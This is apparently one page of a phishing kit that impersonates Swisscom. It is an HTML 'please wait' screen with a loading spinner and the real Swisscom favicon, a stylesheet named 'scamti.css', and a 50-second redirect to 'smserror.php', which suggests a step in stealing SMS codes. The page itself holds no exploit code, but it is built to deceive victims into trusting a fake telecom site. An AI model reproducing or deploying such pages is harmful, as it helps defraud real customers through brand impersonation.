<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Swisscom</title>
<meta name="generator" content="WYSIWYG Web Builder 14 - http://www.wysiwygwebbuilder.com">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<link href="favicon.ico" rel="shortcut icon" type="image/x-icon">
<link href="app_icon_oficina_128x128.png" rel="apple-touch-icon" sizes="128x128">
<link rel="icon" type="image/x-icon" href="https://rcp.scsstatic.ch/etc/designs/portal/resources/favicon.ico">
<link href="scamti.css" rel="stylesheet">
<link href="MOBILE.css" rel="stylesheet">
</head>
<body>

         <meta http-equiv="refresh" content="50; url=smserror.php" />

<div id="FlexContainer1">
<div id="wb_LayoutGrid1">
<div id="LayoutGrid1">
<div class="col-1">
<div id="wb_LayoutGrid2">
<div id="LayoutGrid2">
<div class="row">
<div class="col-1">
<div id="wb_Image" style="">
<img src="load.gif" id="Image1" alt="">
</div>
<div id="wb_Text2">
<span style="color:#000000;font-family:Arial;font-size:16px;"><br><br><br>Bitte warten... <strong></strong>.<br></span>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>